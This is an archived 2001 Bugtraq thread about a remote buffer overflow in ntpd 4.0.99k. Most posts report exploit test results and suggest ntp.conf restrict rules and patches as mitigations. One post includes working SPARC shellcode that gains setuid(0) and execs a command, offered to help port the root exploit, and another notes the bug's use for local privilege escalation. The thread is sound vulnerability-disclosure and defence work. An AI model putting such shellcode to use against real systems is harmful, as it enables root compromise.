Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Stephen Clouse <stephenc@THEIQGROUP.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010405225645.A280@owns.warpcore.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Having no effect on ntp-4.0.99k compiled from official source on
Slackware 7.0.  Exploit says /tmp/sh was spawned but it never
actually runs (/bin/bash mode didn't change).

- --
Stephen Clouse <stephenc@theiqgroup.com>
Senior Programmer, IQ Coordinator Project Lead
The IQ Group, Inc. <http://www.theiqgroup.com/>

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQA/AwUBOs0+fQOGqGs0PadnEQKscQCfYNJ7FaEtsTsszoMV808EtU4ICesAoLp3
WBFZUQZ0nrNyd/MwAG0178Qu
=YatU
-----END PGP SIGNATURE-----
(6328704) /Stephen Clouse <stephenc@THEIQGROUP.COM>/(Ombruten)
6328774 2001-04-06 16:58 +0200  /32 rader/ Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  20:28  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: kluka@DANKA.II.FMPH.UNIBA.SK
Mottagare: Bugtraq (import) <16364>
Kommentar till text 6323528 av Charles Sprickman <spork@INCH.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010406165809.A7355@danka.ii.fmph.uniba.sk>

On Thu, Apr 05, 2001 at 08:03:38PM -0400, Charles Sprickman wrote:
...
> Just a quick note to save others a bit of legwork...  If you are running
> ntpd on a machine simply as a client, the following line in /etc/ntp.conf
> should keep people away:
>
> restrict default ignore
>
> Before adding this (I actually had the wrong syntax), the exploit crashed
> ntpd.  Afterwords, not a blip, and ntpdate shows that ntpd is not
> answering anything...

Time servers that ntpd is synchronized to are also subject to the
restriction.  So, if this is the only `restrict' in your ntp.conf, it
also prevents synchronization to the time server.

Besides `restrict default ignore' there should be

    restrict time.server.address nomodify

for every 'server time.server.address' in your ntp.conf.

Now, ntpd can be crashed/exploited only by evil queries coming from
time.server.address (or by UDP-spoofed queries from anywhere else
:-/).

						JK
(6328774) /Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>/(Ombruten)
6328790 2001-04-05 22:25 -0600  /21 rader/ William D. Colburn (aka Schlake) <wcolburn@NMT.EDU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  20:31  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: wcolburn@NMT.EDU
Mottagare: Bugtraq (import) <16365>
Kommentar till text 6323242 av Gary E. Miller <gem@RELLIM.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
I sent them a short mail asking if they know, and got back a short
mail saying lots and lots had reported it.

On Wed, Apr 04, 2001 at 02:38:13PM -0700, Gary E. Miller wrote:
> Yo All!
>
> ftp.udel.edu lists ntp 4.0.99k as the newest available.
>
> Any patches yet?
>
> Have the maintainers been notified?
>
> RGDS
> GARY

--
William Colburn, "Sysprog" <wcolburn@nmt.edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/     http://www.nmt.edu/~wcolburn
(6328790) /William D. Colburn (aka Schlake) <wcolburn@NMT.EDU>/(Ombruten)
Bilaga (message/rfc822) i text 6328791
6328791 2001-04-05 22:25 -0600  /19 rader/ William D. Colburn (aka Schlake) <wcolburn@NMT.EDU>
Importerad: 2001-04-06  20:31  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: wcolburn@NMT.EDU
Mottagare: Bugtraq (import) <16366>
Bilaga (text/plain) till text 6328790
Ärende: Bilaga till: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
Return-Path: <mills@huey.udel.edu>
Received: from huey.udel.edu (huey.ee.udel.edu [128.175.2.18])
	by mailhost.nmt.edu (8.11.3/8.11.3) with SMTP id f35Ft6T08503
	for <wcolburn@nmt.edu>; Thu, 5 Apr 2001 09:55:06 -0600
Date:     Thu, 5 Apr 2001 11:54:47 EDT
From: Dave Mills <mills@huey.udel.edu>
To: "William D. Colburn" (aka Schlake) <wcolburn@nmt.edu>
cc: mills@udel.edu
Subject:  Re:  ntpd buffer overflow
Message-ID:  <200104051154.aa01903@huey.udel.edu>

William,

Be advised I/we are aware of the problem. Lots and lots of folks have
reported it.

Dave
(6328791) /William D. Colburn (aka Schlake) <wcolburn@NMT.EDU>/
6329104 2001-04-06 00:24 -0400  /36 rader/ Erik Fichtner <techs@OBFUSCATION.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  21:46  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: techs@obfuscation.org
Mottagare: Bugtraq (import) <16371>
Kommentar till text 6323400 av Durval Menezes <durval@TMP.COM.BR>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
On Thu, Apr 05, 2001 at 08:52:43AM -0300, Durval Menezes wrote:
> Tried here against stock xntpd 3.5f (from xntpd-3.5f-3.i386.rpm) on a Redhat
> Linux 3.0.3 w/ kernel 2.0.36, and the exploit didn't have ANY effect: no
> root shell was spawned, and the daemon stayed up. An "strace" of the running
> xntpd process confirmed this: no exec syscalls were attempted.

[...]

> Another vindication for those (like me) that don't like to run the
> "latest and greatest" versions of any code ....

False hope, man. 

xntpd 3.5f [1] has the exact same ctl_getitem() that 4.0.99k has, 
with the same char buf[128] that is poked at in the exact same way.
(line 1733 of xntpd/ntp_control.c) 

It's just a matter of fiddling with it until it's breakable on your 
particular system.

The previously posted patch is a pretty rough way to escape, but it
seems to work just fine.


[1] Yeah, I just happened to have an old copy of this in a sources
archive.



-- 
                        Erik Fichtner; Unix Ronin
                    http://www.obfuscation.org/techs/ "The reasonable
man adapts himself to the world; the unreasonable one persists in
trying to adapt the world to himself.  Therefore, all progress
depends on the unreasonable." -- George Bernard Shaw
(6329104) /Erik Fichtner <techs@OBFUSCATION.ORG>/(Ombruten)
Bilaga (application/pgp-signature) i text 6329105
Kommentar i text 6329452 av Durval Menezes <durval@TMP.COM.BR>
6329105 2001-04-06 00:24 -0400  /10 rader/ Erik Fichtner <techs@OBFUSCATION.ORG>
Importerad: 2001-04-06  21:46  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: techs@obfuscation.org
Mottagare: Bugtraq (import) <16372>
Bilaga (text/plain) till text 6329104
Ärende: Bilaga till: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iEYEARECAAYFAjrNRRMACgkQDf8awdbGHo330gCguSJAHx6wyUQHAPOWUzw6/77/
9bEAn1GQW9P+w16jqlxcXNjAofokJt+M
=hYkr
-----END PGP SIGNATURE-----
(6329105) /Erik Fichtner <techs@OBFUSCATION.ORG>/---
6329452 2001-04-06 08:38 -0300  /54 rader/ Durval Menezes <durval@TMP.COM.BR>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  23:08  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: durval@TMP.COM.BR
Mottagare: Bugtraq (import) <16379>
Kommentar till text 6329104 av Erik Fichtner <techs@OBFUSCATION.ORG>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Durval Menezes <durval@TMP.COM.BR>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010406083817.C17140@tmp.com.br>

Hello,

On Fri, Apr 06, 2001 at 12:24:53AM -0400, Erik Fichtner wrote:
> On Thu, Apr 05, 2001 at 08:52:43AM -0300, Durval Menezes wrote:
> > Tried here against stock xntpd 3.5f (from xntpd-3.5f-3.i386.rpm) on a Redhat
> > Linux 3.0.3 w/ kernel 2.0.36, and the exploit didn't have ANY effect: no
> > root shell was spawned, and the daemon stayed up. An "strace" of the running
> > xntpd process confirmed this: no exec syscalls were attempted.
>
> [...]
>
> > Another vindication for those (like me) that don't like to run the
> > "latest and greatest" versions of any code ....
>
> False hope, man.
>
> xntpd 3.5f [1] has the exact same ctl_getitem() that 4.0.99k has,
> with the same char buf[128] that is poked at in the exact same way.
> (line 1733 of xntpd/ntp_control.c)
>
> It's just a matter of fiddling with it until it's breakable on your
> particular system.

If it's really vulnerable, shouldn't it have at least dumped core?

I think that, when you exercise a buffer overflow against a program
that's vulnerable, if that buffer overflow isn't "tuned" (i.e., the
forced syscalls aren't the right number or the right parameters, the
stack frame isn't as expected, or it's not even the right CPU), there
would be a *very* high probability (almost a certainty) of aborting
the program somehow (either because of an invalid instruction, or
because of an invalid syscall number, or because the stack frame
format was violated).

But you are right, I should have checked. Will do it ASAP: compiling
and running a "-g" version under GDB (or else inserting a few
well-placed printf/syslog()'s) and exercising the attack should do
it. My theory right now (without looking at the source code) is that
the exploit has not worked because something else in the code
(outside of ctl_getitem()) has prevented it.

> The previously posted patch is a pretty rough way to escape, but it seems
> to work just fine.

Thanks for the info.

Best Regards,
--
   Durval Menezes (durval AT tmp DOT com DOT br, http://www.tmp.com.br/)
(6329452) /Durval Menezes <durval@TMP.COM.BR>/(Ombruten)
6329201 2001-04-06 00:35 -0400  /37 rader/ Valdis Kletnieks <Valdis.Kletnieks@VT.EDU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  22:06  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: Valdis.Kletnieks@VT.EDU
Mottagare: Bugtraq (import) <16373>
Kommentar till text 6323400 av Durval Menezes <durval@TMP.COM.BR>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Valdis Kletnieks <Valdis.Kletnieks@VT.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <200104060435.f364ZMn22966@foo-bar-baz.cc.vt.edu>

On Thu, 05 Apr 2001 08:52:43 -0300, Durval Menezes <durval@TMP.COM.BR>  said:
> Tried here against stock xntpd 3.5f (from xntpd-3.5f-3.i386.rpm) on a Redhat
> Linux 3.0.3 w/ kernel 2.0.36, and the exploit didn't have ANY effect: no
> root shell was spawned, and the daemon stayed up. An "strace" of the running
> xntpd process confirmed this: no exec syscalls were attempted.
>
> Same think on SPARC Solaris 2.5.1 also running xntpd 3.5f: no shell, and
> the xntpd daemon stayed up with no exec syscalls showing on "truss".
>
> Another vindication for those (like me) that don't like to run the
> "latest and greatest" versions of any code (I only upgrade my machines
> when forced to, either because of security bugs, or because of desperately
> needed new functionality, and even then only after running it for awhile
> on a test system INSIDE my firewall, and preferably doing an audit on the
> code myself).

That doesn't prove you're not vulnerable. It proves the
proof-of-concept code doesn't work against that release.

As Dijkstra pointed out decades ago:

"Testing can prove the presence of bugs, but not their absence."

Until somebody shows that the bug was in code introduced at level
4.mumble or something, I'm going to have to assume that the bug has
been in there ever since the NTPv1 distribution, especially since it
causes a segfault on the Irix ntp 3.5.

				Valdis Kletnieks
				Operating Systems Analyst
				Virginia Tech
(6329201) /Valdis Kletnieks <Valdis.Kletnieks@VT.EDU>/(Ombruten)
6329228 2001-04-05 22:33 -0400  /28 rader/ Erik Fichtner <techs@OBFUSCATION.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  22:14  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: techs@obfuscation.org
Mottagare: Bugtraq (import) <16374>
Kommentar till text 6323277 av Ogle Ron (Rennes) <OgleR@THMULTI.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
On Thu, Apr 05, 2001 at 11:38:47AM +0200, Ogle Ron (Rennes) wrote:
> Until that time, we are blocking NTP access from the Internet (for those of
> us who use Internet stratum 1 servers) for the NTP protocol.  

> I suggest that other people in the same situation do the same until a proper
> fix is made.

Unfortunately, the exploit makes a really handy local exploit for a user
who can already get a binary onto the system.   Since the ntp server
will crash in its death throes, one can't really use it to fire a whole
sequence of commands into the system, but it's pretty easy to use it for
local privilege elevation.   Good luck with firewalling that. ;)

Thanks for the link to a patch, though.  It's worth looking at to see
if it really solves the problem or not.

Also, has anyone tested this exploit against ntp implementations on routers
and such?   Some of us have to wait for a "maintenance window" before we
can potentially hork up a router. 

-- 
                        Erik Fichtner; Unix Ronin
                    http://www.obfuscation.org/techs/ "The reasonable
man adapts himself to the world; the unreasonable one persists in
trying to adapt the world to himself.  Therefore, all progress
depends on the unreasonable." -- George Bernard Shaw
(6329228) /Erik Fichtner <techs@OBFUSCATION.ORG>/(Ombruten)
Bilaga (application/pgp-signature) i text 6329229
6329229 2001-04-05 22:33 -0400  /10 rader/ Erik Fichtner <techs@OBFUSCATION.ORG>
Importerad: 2001-04-06  22:14  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: techs@obfuscation.org
Mottagare: Bugtraq (import) <16375>
Bilaga (text/plain) till text 6329228
Ärende: Bilaga till: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iEYEARECAAYFAjrNKwcACgkQDf8awdbGHo2GGwCfXHGJdBeS2XXmGejemZxjr1rY
Es8AoI94FJCWqG/xootusmnUejxuL/xH
=pxUf
-----END PGP SIGNATURE-----
(6329229) /Erik Fichtner <techs@OBFUSCATION.ORG>/---
6329251 2001-04-06 10:44 +0000  /20 rader/ Sebastian Piech <decc@W-SIECI.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  22:19  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: decc@W-SIECI.COM
Mottagare: Bugtraq (import) <16376>
Kommentar till text 6323336 av Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Sebastian Piech <decc@W-SIECI.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3ACD9E13.42919CF5@w-sieci.com>

Tomasz Grabowski wrote:

> On IRIX 6.5.11 it also seg faults.
>
> ntpq
> ntpq> version
> ntpq 3-5.93e Thu Dec 10 10:49:39 PST 1998 (1)
> ntpq> quit
>
> It's rather old isn't it?
> It's the default IRIX 6.5.11 installation.

The exploit doesn't work against the same version of xntpd [3-5.93e Fri Feb 18
18:55:22 EST 2000 (1)] on RH 6.2 with kernel 2.2.14-5.0 (default
installation).
(6329251) /Sebastian Piech <decc@W-SIECI.COM>/(Ombruten)
6329319 2001-04-06 13:27 +0200  /62 rader/ Alexander Gall <gall@SWITCH.CH>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  22:41  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: gall@SWITCH.CH
Mottagare: Bugtraq (import) <16377>
Kommentar till text 6323794 av Matt Collins <matt@CLUES.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Alexander Gall <gall@SWITCH.CH>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <E14lUOe-0002dF-00@central.switch.ch>

> On Wed, Apr 04, 2001 at 06:49:01PM -0700, Crist Clark wrote:
> > Przemyslaw Frasunek wrote:
> > >
> > > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
> >
> > Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> > the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
> >
> > More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
> > caused it to seg. fault and core. No time to double-check if that is actually
> > exploitable at this moment. How many NTP distributions are based off of the
> > vulnerable code? With the small payload, gaining access might be hard, but
> > the potential for DoS looks pretty easy.
>
> We've taken a peek at getting sparc shellcode working with this. Getting
> it in below the 70 byte buffer size is tricky.
>
> Does anybody out there have working shellcode for this that can do *anything*
> to the state of the system even if it doesnt lead to full sploit? (beyond
> making ntp core of course ;) )

Well, here is a shellcode that is 69 bytes large and execs
'/bin/touch /tmp/test' as root (if called from a setuid root program)

char shellcode[]=
"\x90\x10\x20\x00" /*           mov 0, %o0              */
"\x82\x10\x20\x17" /*           mov 23, %g1             */
"\x91\xd0\x20\x08" /*           ta 8 -> setuid(0)       */
"\x30\x80\x00\x07" /*           ba,a bounce             */
"\x90\x03\xe0\x08" /* start:    add %o7, 8, %o0         */
"\x92\x03\xa0\x40" /*           add %sp, 64, %o1        */
"\xd0\x22\x40\x00" /*           st %o0, [%o1]           */
"\xc0\x22\x60\x04" /*           st %g0, [%o1+4]         */
"\x82\x10\x20\x0b" /*           mov 11, %g1             */
"\x91\xd0\x20\x08" /*           ta 8 -> exec()          */
"\x7f\xff\xff\xfa" /* bounce:   call start              */
"\x01\x00\x00\x00" /*           nop                     */
"/bin/touch /tmp/test";

I don't know if you are aware of this, but simply replacing the
shellcode in the exploit won't work because of the differing layout
of a stack frame on SPARC.

I have also verified that xntpd 3.4y crashes on Solaris 8 with
SIGSEGV.  However, when I looked at the core dump I had the
impression that this is *not* due to a buffer overflow because I
couldn't find any of the symptoms that I would expect in such a case
(jump to never-never land because the overwritten return address on
the stack is garbage, %l and %i registers filled with data from the
buffer). I didn't look too hard though, so I may be wrong.

Alex.

 ___________ SWITCH - The Swiss Academic and Research Network ___________
 Alexander Gall,  SWITCH,  Limmatquai 138,  CH-8001 Zurich,  Switzerland
 gall@switch.ch         Tel: +41 1 268 1522          Fax: +41 1 268 1568
(6329319) /Alexander Gall <gall@SWITCH.CH>/(Ombruten)
6329325 2001-04-06 00:06 -0700  /18 rader/ Phil Stracchino <alaric@BABCOM.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  22:43  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: alaric@BABCOM.COM
Mottagare: Bugtraq (import) <16378>
Kommentar till text 6323277 av Ogle Ron (Rennes) <OgleR@THMULTI.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Phil Stracchino <alaric@BABCOM.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010406000614.A4715@babylon5.babcom.com>

On Thu, Apr 05, 2001 at 11:38:47AM +0200, Ogle Ron (Rennes) wrote:
> There is only a patch for the NTP software from
> http://phk.freebsd.dk/patch/ntpd.patch.

I just tried applying this patch against ntp-4.0.99k, and it fails.


--
 Linux Now!   ..........Because friends don't let friends use Microsoft.
 phil stracchino   --   the renaissance man   --   mystic zen biker geek
    Vr00m:  2000 Honda CBR929RR   --   Cage:  2000 Dodge Intrepid R/T
 Previous vr00mage:  1986 VF500F (sold), 1991 VFR750F3 (foully murdered)
(6329325) /Phil Stracchino <alaric@BABCOM.COM>/-----
6329474 2001-04-06 09:38 -0700  /57 rader/ Crist Clark <crist.clark@GLOBALSTAR.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  23:15  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: crist.clark@GLOBALSTAR.COM
Mottagare: Bugtraq (import) <16380>
Kommentar till text 6323528 av Charles Sprickman <spork@INCH.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Crist Clark <crist.clark@GLOBALSTAR.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3ACDF0F6.38E165C7@globalstar.com>

Charles Sprickman wrote:
>
> On Wed, 4 Apr 2001, Przemyslaw Frasunek wrote:
>
> > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
>
> Just a quick note to save others a bit of legwork...  If you are running
> ntpd on a machine simply as a client, the following line in /etc/ntp.conf
> should keep people away:
>
> restrict default ignore
>
> Before adding this (I actually had the wrong syntax), the exploit crashed
ntpd.  Afterwards, not a blip, and ntpdate shows that ntpd is not
> answering anything...

One more thing you can do is,

  restrict <server IP> noquery

To a server that you are sync'ing from. This protects you from this
exploit, but you can still sync to it. (At least my logic and quick
tests agree with this.)

This is good for the situation where one might be syncing to a public
NTP server (clock.nist.gov, etc.). Since anyone could craft a packet
with that source, you want to deny queries from it, but you can still
sync to it. You can even do,

  restrict 127.0.0.1 noquery

To prevent the local exploit on multi-user machines. Your clock will
still sync, but you cannot use 'ntpdc,' 'ntpq,' etc. to check on your
NTP status.

This is not good for your server peering with other hosts or
answering client queries. Besides getting patched software (which is
not yet widely available), using authentication keys should protect
you. However, if the peers or clients are not trusted... Yer hosed.
--
Crist J. Clark                                Network Security Engineer
crist.clark@globalstar.com                    Globalstar, L.P.
(408) 933-4387                                FAX: (408) 933-4926

The information contained in this e-mail message is confidential,
intended only for the use of the individual or entity named above.
If the reader of this e-mail is not the intended recipient, or the
employee or agent responsible to deliver it to the intended
recipient, you are hereby notified that any review, dissemination,
distribution or copying of this communication is strictly prohibited.
If you have received this e-mail in error, please contact
postmaster@globalstar.com
(6329474) /Crist Clark <crist.clark@GLOBALSTAR.COM>/(Ombruten)
6329597 2001-04-05 20:51 -0700  /58 rader/ Rex Sanders <rex@OCTOPUS.WR.USGS.GOV>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06  23:41  av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: rex@OCTOPUS.WR.USGS.GOV
Mottagare: Bugtraq (import) <16381>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Rex Sanders <rex@OCTOPUS.WR.USGS.GOV>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <l0313030ab6f2e67c32e9@[130.118.24.88]>

You can stop the exploit/DOS with restrictions in the "ntp.conf" file,
while continuing to receive or serve time.  You must stop NTP daemon
configuration and statistics queries.  See the ntpd access control man page:
  http://www.eecis.udel.edu/~ntp/ntp_spool/html/accopt.htm

Also, quoting from the man page:
>While this facility may be otherwise useful for keeping unwanted or broken
>remote time servers from affecting your own, it should not be considered an
>alternative to the standard NTP authentication facility. Source address
>based restrictions are easily circumvented by a determined cracker.

See the ntpd authentication control man page:
  http://www.eecis.udel.edu/~ntp/ntp_spool/html/authopt.htm

Partial examples of what we use below (restrictions, no
authentication).  I'm not an NTP guru, maybe someone else can do
better, but these restrictions stopped the remote exploit without a
reply on various stock Solaris systems; removing the restrictions
caused a core dump upon attack.

Even after the buffer overflow is plugged, hosts running ntp should
have appropriate restrictions in the ntp.conf file.

-- Rex


# Unix time client add:
#
#  Don't serve time or stats to anyone else
#  NOTE(review): the per-address restrict lines below appear to take
#  precedence over this default for packets carrying those source
#  addresses -- confirm against the accopt man page linked above.
restrict default ignore

#  Prefer to get time from local GPS server
server clock.example.com prefer
#  NOTE(review): nomodify only blocks runtime configuration changes; it
#  does not block the configuration/statistics queries that the note
#  above says must be stopped. A packet spoofed with this source address
#  would still reach the query path, so 'nomodify noquery' (compare the
#  server example) looks safer here -- confirm against the accopt man page.
restrict 10.1.1.12 nomodify

#  Backup server
server clock2.example.com
#  NOTE(review): same caveat as the primary server entry above (no noquery).
restrict 10.1.1.13 nomodify

==========

# Unix time server add:
#
#  Don't serve time or stats to anyone else
#  NOTE(review): the per-address restrict lines below appear to take
#  precedence over this default for packets carrying those source
#  addresses -- confirm against the accopt man page linked above.
restrict default ignore

#  Serve time to local subnets
#  noquery denies the control/statistics queries this note says must be
#  stopped while still answering time requests; see the accopt man page
#  linked above for the exact semantics of notrust and nopeer.
restrict 10.1.1.0 mask 255.255.255.0 noquery notrust nopeer
restrict 10.1.2.0 mask 255.255.255.0 noquery notrust nopeer

#  Prefer to get time from local GPS server
server clock.example.com prefer
#  NOTE(review): unlike the subnet entries, this line lacks noquery, so a
#  packet spoofed with the upstream server's address would still reach the
#  query path; 'nomodify noquery' looks safer -- confirm against the
#  accopt man page.
restrict 10.1.1.12 nomodify
(6329597) /Rex Sanders <rex@OCTOPUS.WR.USGS.GOV>/(Ombruten)